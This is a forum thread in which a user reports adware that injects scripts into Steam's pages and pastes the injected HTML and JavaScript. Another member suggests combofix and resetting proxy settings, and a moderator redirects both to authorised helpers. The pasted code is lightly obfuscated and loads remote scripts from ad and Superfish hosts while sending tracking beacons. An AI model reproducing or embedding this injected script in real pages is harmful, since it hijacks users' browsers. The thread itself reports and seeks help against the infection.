Jump to content

Steam Adware


tgspy

Recommended Posts

This is a rampant adware that I was unfortunately recently infected with, it was gained from an unknown location.

 

The script that it is injecting into the steam source is as follows

 

<!DOCTYPE html><html><head><script type="text/javascript" async="" src=""http://adsdelivery1.com"+"/no-im"+"pressi"+"on.gif?p=490&ch=amonetize.full"+"&l=AU"+"&h=2bf8e7f3d510e7970144ebd0fdcf3351&t="+new Date().getTime()+"&s=0d400ba3a88947e0832a456df51ad68c";</script><script type="text/javascript">new Image().src = "http://adsdelivery1.com"+"/im"+"pressi"+"on.gif?b=527"+"&p=488&ch=amonetize.full&ap=&cps=&c"+"=76&l=AU"+"&h=5ad23c4524c190eab9ab03cfd15f4ee8&t="+new Date().getTime()+"&s=0d400ba3a88947e0832a456df51ad68c";</script><script type="text/javascript">
var script = document.createElement("script");
if (window.location.protocol=="http:") {
}
else {
}
document.head.appendChild(script);
</script><script type="text/javascript">new Image().src = "http://adsdelivery1.com"+"/im"+"pressi"+"on.gif?b=986"+"&p=491&ch=amonetize.full&ap=&cps=&c"+"=69&l=AU"+"&h=08bdd86569aa6f59ce860076456a38e9&t="+new Date().getTime()+"&s=8e82c853c1254d9c30bd86a5f3a58553";</script><script type="text/javascript">
var s = document.createElement("script");
    s.type = "text/javascript";
document.body.appendChild(s);
</script><script type="text/javascript">new Image().src = "http://adsdelivery1.com"+"/im"+"pressi"+"on.gif?b=529"+"&p=749&ch=amonetize.full&ap=&cps=&c"+"=78&l=AU"+"&h=d65fcf27d5967e28b1287f88d96c80c7&t="+new Date().getTime()+"&s=8e82c853c1254d9c30bd86a5f3a58553";</script><script type="text/javascript">
   var s = document.createElement("script");
    s.id = "inj_grazit_script_starter";
    s.type = "text/javascript";
    s.src = (location.protocol == "https:" ? "https:" : "http:") +  "//ext1.engageya.com/widget/inject_spark/inj_sprk_starter.js?pid=LTEsOTQ4NjUsNDQ3NzksNDc4MjU%3D&subid=749";
    document.head.appendChild(s);
</script><script type="text/javascript">new Image().src = "http://adsdelivery1.com"+"/im"+"pressi"+"on.gif?b=369"+"&p=242&ch=amonetize.full&ap=&cps=&c"+"=31&l=AU"+"&h=f035c9d25a337c1f21da85be85cbc1ff&t="+new Date().getTime()+"&s=8e82c853c1254d9c30bd86a5f3a58553";</script><script type="text/javascript">
var script = document.createElement("script");
script.src = window.location.protocol + '//www.superfish.com/ws/sf_main.jsp?dlsource=ygztifv&CTID=generic';
document.head.appendChild(script);
</script><script type="text/javascript">new Image().src = "http://adsdelivery1.com"+"/im"+"pressi"+"on.gif?b=370"+"&p=241&ch=amonetize.full&ap=&cps=&c"+"=32&l=AU"+"&h=52f2929cb20d2b79fee45e8ba3a73d72&t="+new Date().getTime()+"&s=8e82c853c1254d9c30bd86a5f3a58553";</script><script type="text/javascript">
var script = document.createElement("script");
var head = document.getElementsByTagName('head')[0];
head.appendChild(script);
 
 
This adware also automatically installs a program called privoxy, in order to automatically change the proxy settings of the computer to redirect to localhost, resulting in no connection to the internet if the privoxy program is terminated. Any help with this would be great, sorry I couldn't provide more details, I found nothing that directed to the file, and no scans helped either.
Link to post
Share on other sites

Hello there is a way of getting rid of this nasty piece of Ad-ware as i had also gotten infected on the 24th of may through a download and it spread through to steam store and community. I was able to fix it by using a program called combofix which basically looks for suspicious files in your system and destroys them. After you run this you should see some malicious files being picked up by combofix if you have ad-ware and will delete it.

 

.:IF STEP 1 WORKED PROCEED TO THIS STEP:.

Note you may come into a different problem with this after removing the ad-ware which is no internet connection because the ad-ware from adsdelivery1DOTcom changes your connection settings which i think is how it bypasses everything but you can very easily re- enable your connection by going to start>Run>type in inter.cpl in the runbox and press enter then click the connections tab and click the LAN settings option if use a proxy is checked if so uncheck it and click apply OK and exit then check if the internet is active again hopefully you should then have internet and will definitely have no ad-ware. 

 

if this does not work you can Google similar problems after uninstalling ad-ware and you will find a alternate way to undo the ad-ware`s nonsense.

 

Pictures below for any extra help if you are stuck!

 

Hope this helped 

 

wcalamaro11 (same name for steam)

 

post-164693-0-38834000-1401089951_thumb.

post-164693-0-37794700-1401089957_thumb.

post-164693-0-57516400-1401089961_thumb.

post-164693-0-28550800-1401089966_thumb.

post-164693-0-85914300-1401089970_thumb.

Link to post
Share on other sites

@tgspy:
 
Hello -- it appears that your post may have been inadvertently overlooked.
We cannot perform malware diagnostics or removal in this sub-section of the forum.
If you would like expert help with checking and cleaning your computer, I suggest that you please follow the advice in this pinned topic: Available Assistance For Possibly Infected Computers.
A malware analyst will assist you with looking into your issue.

 

 

 

@wcalamaro11:

 

Thanks for your offer of assistance.

However, regular members are NOT permitted to provide malware advice here at the forums.

Only authorized helpers may do so, and that work is conducted in a dedicated section of the forum - the individual OP and the authorized helpers work one-on-one there.

 

Thanks to you both,

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.